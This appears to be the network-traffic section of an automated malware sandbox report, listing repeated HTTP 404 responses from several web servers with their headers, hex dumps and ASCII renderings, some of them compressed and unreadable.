Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 03 Jul 2024 06:53:48 GMTContent-Type: text/htmlContent-Length: 146Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closex-litespeed-tag: 39e_HTTP.404expires: Wed, 11 Jan 1984 05:00:00 GMTcache-control: no-cache, must-revalidate, max-age=0content-type: text/html; charset=UTF-8link: <https://mocar.pro/wp-json/>; rel="https://api.w.org/"x-et-api-version: v1x-et-api-root: https://mocar.pro/wp-json/tribe/tickets/v1/x-et-api-origin: https://mocar.prox-tec-api-version: v1x-tec-api-root: https://mocar.pro/wp-json/tribe/events/v1/x-tec-api-origin: https://mocar.prox-litespeed-cache-control: no-cachetransfer-encoding: chunkedcontent-encoding: brvary: Accept-Encodingdate: Wed, 03 Jul 2024 06:55:02 GMTserver: LiteSpeedData Raw: 32 33 63 64 0d 0a f4 ff 1b 22 aa 6a 3d 14 51 d1 ea e1 88 d4 ac 1e 00 8d 94 85 f3 f7 8f d0 e1 73 de 97 99 66 6f eb f3 82 90 2a 0a 88 41 90 92 cf a2 82 39 ae 93 ae 14 44 36 29 d8 20 c0 00 ad cb 1c 26 d9 7d ff f3 b7 4c eb cf c9 e5 44 c5 b3 c4 3d 3c 45 a0 c5 b6 3c cb 96 dc fe da c7 bf a8 9e e0 49 62 82 80 06 64 cb ed ca 5f fb 55 96 0f b0 b1 11 96 d9 c5 45 a5 3c b0 ea d7 dd 62 e0 8b 03 a4 c9 ee 1d bf ee d7 30 b0 33 cb 78 77 b3 7b 04 ac 42 20 23 a3 81 58 01 1b 31 f2 ce c8 b8 c8 08 21 e3 ff b7 d6 a7 30 11 2a c2 46 e9 58 55 af aa 02 f3 43 88 0f aa aa 3f ce 0f 01 f9 3d ab f6 c4 45 8a ac 0a 91 34 dd b7 82 d3 61 9c 0d ab 25 f0 2e ec b3 0c a7 53 b9 94 18 41 d3 7f 05 fa 18 aa fd 2f 0a 08 4a 13 c1 d4 cd 64 a8 d9 7c 77 66 07 76 6c 0e 81 10 5b f0 ba 5f f2 4d fe 58 63 67 7b af ba 78 45 7b 9b be 7b f5 19 07 b5 a5 c5 59 ab b5 0e 11 50 d1 25 bf 4b b7 3c 4e 77 a0 68 54 89 a3 c2 88 65 a8 27 28 c6 45 04 59 cc fb 34 69 ac b4 05 35 a7 f4 fe 59 e3 6e 48 00 ab 68 1f 7c 63 2c fc a9 e2 38 62 91 65 6d d7 b7 d2 87 36 db 37 2e 9b 23 fe 4e d0 a0 85 3b 1f 31 78 a7 89 33 40 6e 7d 44 fd df ff 35 b9 75 da c2 ad f1 4e 93 e4 b7 cb c5 7c be 24 af 7d a5 83 ec 83 6f fc 4c fd 53 d3 2c b3 e0 57 1e e3 4c f8 2a 33 e7 07 dd 3f 54 10 e7 db 8a cb 9a 91 ec ce 44 d6 ac 59 ed 62 3a 58 fb c1 58 ad 67 02 0f 9d 65 59 c7 49 87 52 00 1a 0a 4b 5b 69 34 de 65 a1 21 e5 0d 48 0b 6f ef 2d 79 a9 9d fe ef ff e4 96 ec 7a 13 75 67 54 24 79 ff 37 66 0d 40 9d 51 09 d6 ff 8d ef c0 a1 0e b7 62 88 28 e7 42 9e b1 08 7b cc 62 aa e9 7b 7d 9a 87 da 92 27 00 35 f7 e3 d8 1d 6a 1d 6e c1 19 9d dd 35 95 b6 6a 2e 41 34 36 be 50 ec ce 64 1c fc 4f f0 cf 5d 0f 9d bf 36 1f 01 d1 b8 36 12 45 06 ba d2 11 3e 07 4b 0b 5f ed b4 cc ca 2c ca 9d Data Ascii: 23cd"j=Qsfo*A9D6) &}LD=<E<Ibd_UE<b03xw{B #X1!0*FXUC?=E4a%.SA/Jd|wfvl[_MXcg{xE{{YP%K<NwhTe'(EY4i5YnHh|c,8bem67.#N;1x3@n}D5uN|$}oLS,WL*3?TDYb:XXgeYIRK[i4e!Ho-yzugT$y7f@Qb(B{b{}'5jn5j.A46PdO]66E>K_,
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closex-litespeed-tag: 39e_HTTP.404expires: Wed, 11 Jan 1984 05:00:00 GMTcache-control: no-cache, must-revalidate, max-age=0content-type: text/html; charset=UTF-8link: <https://mocar.pro/wp-json/>; rel="https://api.w.org/"x-et-api-version: v1x-et-api-root: https://mocar.pro/wp-json/tribe/tickets/v1/x-et-api-origin: https://mocar.prox-tec-api-version: v1x-tec-api-root: https://mocar.pro/wp-json/tribe/events/v1/x-tec-api-origin: https://mocar.prox-litespeed-cache-control: no-cachetransfer-encoding: chunkedcontent-encoding: brvary: Accept-Encodingdate: Wed, 03 Jul 2024 06:55:04 GMTserver: LiteSpeedData Raw: 32 33 63 64 0d 0a f4 ff 1b 22 aa 6a 3d 14 51 d1 ea e1 88 d4 ac 1e 00 8d 94 85 f3 f7 8f d0 e1 73 de 97 99 66 6f eb f3 82 90 2a 0a 88 41 90 92 cf a2 82 39 ae 93 ae 14 44 36 29 d8 20 c0 00 ad cb 1c 26 d9 7d ff f3 b7 4c eb cf c9 e5 44 c5 b3 c4 3d 3c 45 a0 c5 b6 3c cb 96 dc fe da c7 bf a8 9e e0 49 62 82 80 06 64 cb ed ca 5f fb 55 96 0f b0 b1 11 96 d9 c5 45 a5 3c b0 ea d7 dd 62 e0 8b 03 a4 c9 ee 1d bf ee d7 30 b0 33 cb 78 77 b3 7b 04 ac 42 20 23 a3 81 58 01 1b 31 f2 ce c8 b8 c8 08 21 e3 ff b7 d6 a7 30 11 2a c2 46 e9 58 55 af aa 02 f3 43 88 0f aa aa 3f ce 0f 01 f9 3d ab f6 c4 45 8a ac 0a 91 34 dd b7 82 d3 61 9c 0d ab 25 f0 2e ec b3 0c a7 53 b9 94 18 41 d3 7f 05 fa 18 aa fd 2f 0a 08 4a 13 c1 d4 cd 64 a8 d9 7c 77 66 07 76 6c 0e 81 10 5b f0 ba 5f f2 4d fe 58 63 67 7b af ba 78 45 7b 9b be 7b f5 19 07 b5 a5 c5 59 ab b5 0e 11 50 d1 25 bf 4b b7 3c 4e 77 a0 68 54 89 a3 c2 88 65 a8 27 28 c6 45 04 59 cc fb 34 69 ac b4 05 35 a7 f4 fe 59 e3 6e 48 00 ab 68 1f 7c 63 2c fc a9 e2 38 62 91 65 6d d7 b7 d2 87 36 db 37 2e 9b 23 fe 4e d0 a0 85 3b 1f 31 78 a7 89 33 40 6e 7d 44 fd df ff 35 b9 75 da c2 ad f1 4e 93 e4 b7 cb c5 7c be 24 af 7d a5 83 ec 83 6f fc 4c fd 53 d3 2c b3 e0 57 1e e3 4c f8 2a 33 e7 07 dd 3f 54 10 e7 db 8a cb 9a 91 ec ce 44 d6 ac 59 ed 62 3a 58 fb c1 58 ad 67 02 0f 9d 65 59 c7 49 87 52 00 1a 0a 4b 5b 69 34 de 65 a1 21 e5 0d 48 0b 6f ef 2d 79 a9 9d fe ef ff e4 96 ec 7a 13 75 67 54 24 79 ff 37 66 0d 40 9d 51 09 d6 ff 8d ef c0 a1 0e b7 62 88 28 e7 42 9e b1 08 7b cc 62 aa e9 7b 7d 9a 87 da 92 27 00 35 f7 e3 d8 1d 6a 1d 6e c1 19 9d dd 35 95 b6 6a 2e 41 34 36 be 50 ec ce 64 1c fc 4f f0 cf 5d 0f 9d bf 36 1f 01 d1 b8 36 12 45 06 ba d2 11 3e 07 4b 0b 5f ed b4 cc ca 2c ca 9d Data Ascii: 23cd"j=Qsfo*A9D6) &}LD=<E<Ibd_UE<b03xw{B #X1!0*FXUC?=E4a%.SA/Jd|wfvl[_MXcg{xE{{YP%K<NwhTe'(EY4i5YnHh|c,8bem67.#N;1x3@n}D5uN|$}oLS,WL*3?TDYb:XXgeYIRK[i4e!Ho-yzugT$y7f@Qb(B{b{}'5jn5j.A46PdO]66E>K_,
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 03 Jul 2024 06:55:13 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 03 Jul 2024 06:55:15 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 03 Jul 2024 06:55:18 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 03 Jul 2024 06:55:21 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 03 Jul 2024 06:56:34 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeExpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-store, no-cache, must-revalidateVary: Accept-Encodinghost-header: c2hhcmVkLmJsdWVob3N0LmNvbQ==X-Newfold-Cache-Level: 2X-Endurance-Cache-Level: 2X-nginx-cache: WordPressCF-Cache-Status: DYNAMICSet-Cookie: _cfuvid=wq93zh6QjYHzH9DTIIA6l77pbfuhMjdj_Wia_iHEJB0-1719989794146-0.0.1.1-604800000; path=/; domain=.www.stefanogaus.com; HttpOnlyServer: cloudflareCF-RAY: 89d4f9f3bacf1871-EWRContent-Encoding: gzipData Raw: 34 39 66 0d 0a 1f 8b 08 00 00 00 00 00 00 03 a4 56 db 8e db 36 10 7d f6 7e c5 44 41 f3 50 94 a6 bd 49 8a 42 2b 7b 91 b4 45 5a a0 97 00 db 22 e8 d3 82 12 c7 12 b3 14 47 25 29 cb 4e 91 7f 2f 28 52 5e 6d 76 13 20 89 5f 64 0d e7 76 e6 0c 8f 5d 3c fa e9 cf 1f ff fa e7 f5 cf d0 f8 56 6f cf 8a f0 00 2d 4c bd c9 d0 b0 bf af b2 ed d9 a2 68 50 c8 ed d9 62 51 b4 e8 05 18 d1 e2 26 db 2b 1c 3a b2 3e 83 8a 8c 47 e3 37 d9 a0 a4 6f 36 12 f7 aa 42 36 be 64 1f 46 59 2a c9 bb 59 8c 21 65 24 1e be 03 43 3b d2 9a 86 0c f8 18 e4 95 d7 b8 bd f2 b8 13 86 e0 95 e8 1d 3c 69 a5 70 cd 05 fc 48 ad 32 35 5c 11 99 82 47 bf 10 e1 2a ab 3a 0f ce 56 9b ac f1 be cb 39 77 31 bc 16 bd 5b 56 d4 f2 a1 63 ca 54 ba 97 e8 f8 5b c7 df fe db a3 3d a6 c7 f2 ad cb b6 05 8f 59 62 42 7f d4 08 fe d8 e1 26 f3 78 f0 bc 72 2e db 7e 0b ff 9d 01 00 94 74 60 4e bd 53 a6 ce a1 24 2b d1 b2 92 0e 17 e3 19 6b e9 1d fb a4 c3 80 e5 8d f2 1f f5 79 7f 76 56 92 3c 4e a5 44 75 53 5b ea 8d 64 15 69 b2 39 0c 8d f2 18 53 25 4b a9 45 75 13 2d b4 47 bb d3 34 b0 43 0e 8d 92 12 4d b4 b7 c2 d6 ca e4 b0 1a f3 3f 1e ac e8 52 01 a1 55 6d 98 f2 d8 ba 1c 2a 34 1e 6d 0c 91 ca 75 5a 1c 73 d8 69 4c ad bf ed 9d 57 bb 23 4b 14 de f5 6f 95 61 0d aa ba f1 39 ac 57 ab 7d 33 96 5a 26 df 54 2d e4 ca 61 7d b7 29 d1 7b 82 e7 df 44 63 27 a4 1c 67 b2 8a ef 61 fa 6c 6c f2 83 72 e2 10 17 2d 87 67 e7 ab 2e 0e 6e 47 e4 d1 a6 5a e9 74 bd 5a 4d a9 c9 29 af c8 e4 b0 53 07 94 17 89 4b ef a9 3d 95 d3 b8 f3 d3 98 52 b6 69 52 0f 75 12 10 96 de dc 23 eb 0e 29 33 0e 55 2b 6a cc c1 90 c1 a9 7c 60 3e 87 75 77 00 47 5a c9 3b 81 61 45 1a 21 69 98 87 3c b0 07 bd 75 c1 d4 91 7a 80 3f 65 b4 32 c8 4a 4d 53 de 1d 19 1f 76 0f 73 58 3f eb 0e 33 e3 90 08 7c b6 9a e6 11 42 4f b4 2e 9f cf 99 63 9e ba 30 df 29 c3 89 ba ef bb 03 3c 3d 99 3f c6 e0 68 97 58 91 15 91 95 5b 88 9e fa aa 61 a2 8a f6 56 18 Data Ascii: 49fV6}~DAPIB+{EZ"G%)N/(R^mv _dv]<Vo-LhPbQ&+:>G7o6B6dFY*Y!e$C;<ipH25\G*:V9w1[VcT[=YbB&xr.~t`NS$+kyvV<NDuS[di9S%KEu-G4CM?RUm*4muZsiLW#Koa9W}3Z&T-a}){Dc'gallr-g.nGZtZM)SK=RiRu#)3U+j|`>uwGZ;aE!i<uz?
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 03 Jul 2024 06:56:36 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeExpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-store, no-cache, must-revalidateVary: Accept-Encodinghost-header: c2hhcmVkLmJsdWVob3N0LmNvbQ==X-Newfold-Cache-Level: 2X-Endurance-Cache-Level: 2X-nginx-cache: WordPressCF-Cache-Status: DYNAMICSet-Cookie: _cfuvid=9nefUG9JgfK8Jvaa6cx.jYVHOqwB4jkc9O3wfoY8OYQ-1719989796691-0.0.1.1-604800000; path=/; domain=.www.stefanogaus.com; HttpOnlyServer: cloudflareCF-RAY: 89d4fa03a8a01871-EWRContent-Encoding: gzipData Raw: 34 39 66 0d 0a 1f 8b 08 00 00 00 00 00 00 03 a4 56 db 8e db 36 10 7d f6 7e c5 44 41 f3 50 94 a6 bd 49 8a 42 2b 7b 91 b4 45 5a a0 97 00 db 22 e8 d3 82 12 c7 12 b3 14 47 25 29 cb 4e 91 7f 2f 28 52 5e 6d 76 13 20 89 5f 64 0d e7 76 e6 0c 8f 5d 3c fa e9 cf 1f ff fa e7 f5 cf d0 f8 56 6f cf 8a f0 00 2d 4c bd c9 d0 b0 bf af b2 ed d9 a2 68 50 c8 ed d9 62 51 b4 e8 05 18 d1 e2 26 db 2b 1c 3a b2 3e 83 8a 8c 47 e3 37 d9 a0 a4 6f 36 12 f7 aa 42 36 be 64 1f 46 59 2a c9 bb 59 8c 21 65 24 1e be 03 43 3b d2 9a 86 0c f8 18 e4 95 d7 b8 bd f2 b8 13 86 e0 95 e8 1d 3c 69 a5 70 cd 05 fc 48 ad 32 35 5c 11 99 82 47 bf 10 e1 2a ab 3a 0f ce 56 9b ac f1 be cb 39 77 31 bc 16 bd 5b 56 d4 f2 a1 63 ca 54 ba 97 e8 f8 5b c7 df fe db a3 3d a6 c7 f2 ad cb b6 05 8f 59 62 42 7f d4 08 fe d8 e1 26 f3 78 f0 bc 72 2e db 7e 0b ff 9d 01 00 94 74 60 4e bd 53 a6 ce a1 24 2b d1 b2 92 0e 17 e3 19 6b e9 1d fb a4 c3 80 e5 8d f2 1f f5 79 7f 76 56 92 3c 4e a5 44 75 53 5b ea 8d 64 15 69 b2 39 0c 8d f2 18 53 25 4b a9 45 75 13 2d b4 47 bb d3 34 b0 43 0e 8d 92 12 4d b4 b7 c2 d6 ca e4 b0 1a f3 3f 1e ac e8 52 01 a1 55 6d 98 f2 d8 ba 1c 2a 34 1e 6d 0c 91 ca 75 5a 1c 73 d8 69 4c ad bf ed 9d 57 bb 23 4b 14 de f5 6f 95 61 0d aa ba f1 39 ac 57 ab 7d 33 96 5a 26 df 54 2d e4 ca 61 7d b7 29 d1 7b 82 e7 df 44 63 27 a4 1c 67 b2 8a ef 61 fa 6c 6c f2 83 72 e2 10 17 2d 87 67 e7 ab 2e 0e 6e 47 e4 d1 a6 5a e9 74 bd 5a 4d a9 c9 29 af c8 e4 b0 53 07 94 17 89 4b ef a9 3d 95 d3 b8 f3 d3 98 52 b6 69 52 0f 75 12 10 96 de dc 23 eb 0e 29 33 0e 55 2b 6a cc c1 90 c1 a9 7c 60 3e 87 75 77 00 47 5a c9 3b 81 61 45 1a 21 69 98 87 3c b0 07 bd 75 c1 d4 91 7a 80 3f 65 b4 32 c8 4a 4d 53 de 1d 19 1f 76 0f 73 58 3f eb 0e 33 e3 90 08 7c b6 9a e6 11 42 4f b4 2e 9f cf 99 63 9e ba 30 df 29 c3 89 ba ef bb 03 3c 3d 99 3f c6 e0 68 97 58 91 15 91 95 5b 88 9e fa aa 61 a2 8a f6 56 18 Data Ascii: 49fV6}~DAPIB+{EZ"G%)N/(R^mv _dv]<Vo-LhPbQ&+:>G7o6B6dFY*Y!e$C;<ipH25\G*:V9w1[VcT[=YbB&xr.~t`NS$+kyvV<NDuS[di9S%KEu-G4CM?RUm*4muZsiLW#Koa9W}3Z&T-a}){Dc'gallr-g.nGZtZM)SK=RiRu#)3U+j|`>uwGZ;aE!i<uz?
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 03 Jul 2024 06:56:39 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeExpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-store, no-cache, must-revalidateVary: Accept-Encodinghost-header: c2hhcmVkLmJsdWVob3N0LmNvbQ==X-Newfold-Cache-Level: 2X-Endurance-Cache-Level: 2X-nginx-cache: WordPressCF-Cache-Status: DYNAMICSet-Cookie: _cfuvid=Cw9MB1XKSws5DhwZsI061vsdZkGfcndq5IStvW62SM0-1719989799693-0.0.1.1-604800000; path=/; domain=.www.stefanogaus.com; HttpOnlyServer: cloudflareCF-RAY: 89d4fa1538f0c431-EWRContent-Encoding: gzipData Raw: 34 39 66 0d 0a 1f 8b 08 00 00 00 00 00 00 03 a4 56 db 8e db 36 10 7d f6 7e c5 44 41 f3 50 94 a6 bd 49 8a 42 2b 7b 91 b4 45 5a a0 97 00 db 22 e8 d3 82 12 c7 12 b3 14 47 25 29 cb 4e 91 7f 2f 28 52 5e 6d 76 13 20 89 5f 64 0d e7 76 e6 0c 8f 5d 3c fa e9 cf 1f ff fa e7 f5 cf d0 f8 56 6f cf 8a f0 00 2d 4c bd c9 d0 b0 bf af b2 ed d9 a2 68 50 c8 ed d9 62 51 b4 e8 05 18 d1 e2 26 db 2b 1c 3a b2 3e 83 8a 8c 47 e3 37 d9 a0 a4 6f 36 12 f7 aa 42 36 be 64 1f 46 59 2a c9 bb 59 8c 21 65 24 1e be 03 43 3b d2 9a 86 0c f8 18 e4 95 d7 b8 bd f2 b8 13 86 e0 95 e8 1d 3c 69 a5 70 cd 05 fc 48 ad 32 35 5c 11 99 82 47 bf 10 e1 2a ab 3a 0f ce 56 9b ac f1 be cb 39 77 31 bc 16 bd 5b 56 d4 f2 a1 63 ca 54 ba 97 e8 f8 5b c7 df fe db a3 3d a6 c7 f2 ad cb b6 05 8f 59 62 42 7f d4 08 fe d8 e1 26 f3 78 f0 bc 72 2e db 7e 0b ff 9d 01 00 94 74 60 4e bd 53 a6 ce a1 24 2b d1 b2 92 0e 17 e3 19 6b e9 1d fb a4 c3 80 e5 8d f2 1f f5 79 7f 76 56 92 3c 4e a5 44 75 53 5b ea 8d 64 15 69 b2 39 0c 8d f2 18 53 25 4b a9 45 75 13 2d b4 47 bb d3 34 b0 43 0e 8d 92 12 4d b4 b7 c2 d6 ca e4 b0 1a f3 3f 1e ac e8 52 01 a1 55 6d 98 f2 d8 ba 1c 2a 34 1e 6d 0c 91 ca 75 5a 1c 73 d8 69 4c ad bf ed 9d 57 bb 23 4b 14 de f5 6f 95 61 0d aa ba f1 39 ac 57 ab 7d 33 96 5a 26 df 54 2d e4 ca 61 7d b7 29 d1 7b 82 e7 df 44 63 27 a4 1c 67 b2 8a ef 61 fa 6c 6c f2 83 72 e2 10 17 2d 87 67 e7 ab 2e 0e 6e 47 e4 d1 a6 5a e9 74 bd 5a 4d a9 c9 29 af c8 e4 b0 53 07 94 17 89 4b ef a9 3d 95 d3 b8 f3 d3 98 52 b6 69 52 0f 75 12 10 96 de dc 23 eb 0e 29 33 0e 55 2b 6a cc c1 90 c1 a9 7c 60 3e 87 75 77 00 47 5a c9 3b 81 61 45 1a 21 69 98 87 3c b0 07 bd 75 c1 d4 91 7a 80 3f 65 b4 32 c8 4a 4d 53 de 1d 19 1f 76 0f 73 58 3f eb 0e 33 e3 90 08 7c b6 9a e6 11 42 4f b4 2e 9f cf 99 63 9e 